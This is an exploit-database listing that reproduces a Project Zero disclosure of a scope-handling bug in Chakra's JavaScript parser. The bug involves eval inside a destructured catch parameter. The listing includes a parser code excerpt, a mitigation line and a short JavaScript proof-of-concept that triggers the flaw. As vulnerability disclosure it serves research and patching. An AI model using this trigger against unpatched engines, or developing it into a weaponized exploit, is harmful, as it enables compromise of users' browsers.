header-logo
Suggest Exploit
vendor:
Chakra Parser
by:
Project Zero
8,8
CVSS
HIGH
Eval Injection
94
CWE
Product Name: Chakra Parser
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Chakra Parser Bug in Javascript

In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. There is a bug when it parses 'eval' in a catch statement's param. The parser creates a temporary block used to create a scope, but it is not actually inserted into the AST. If the parser meets 'eval' in 'ParseDestructuredLiteral', it calls 'pnodeCatchScope->SetCallsEval'. But 'pnodeCatchScope' is not inserted into the AST. So the bytecode generator doesn't know it calls 'eval', and it can't create scopes properly.

Mitigation:

Ensure that the parser is updated to properly handle 'eval' in 'ParseDestructuredLiteral' and insert the temporary block into the AST.
Source

Exploit-DB raw data:

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1326

In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. And there's a bug when it parses "eval" in a catch statement's param.

ParseNodePtr Parser::ParseCatch()
{
    ...
        pnodeCatchScope = StartParseBlock<buildAST>(PnodeBlockType::Regular, isPattern ? ScopeType_CatchParamPattern : ScopeType_Catch);
        ...
        ParseNodePtr pnodePattern = ParseDestructuredLiteral<buildAST>(tkLET, true /*isDecl*/, true /*topLevel*/, DIC_ForceErrorOnInitializer);
    ...
}

1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually inserted into the AST.
2. If the parser meets "eval" in "ParseDestructuredLiteral", it calls "pnodeCatchScope->SetCallsEval".
3. But "pnodeCatchScope" is not inserted into the AST. So the bytecode generator doesn't know it calls "eval", and it can't create scopes properly.

PoC:
-->

function f() {
    {
        let i;
        function g() {
            i;
        }

        try {
            throw 1;
        } catch ({e = eval('dd')}) {
        }
    }
}

f();

Navigation

Suggest Exploit

Services By CQR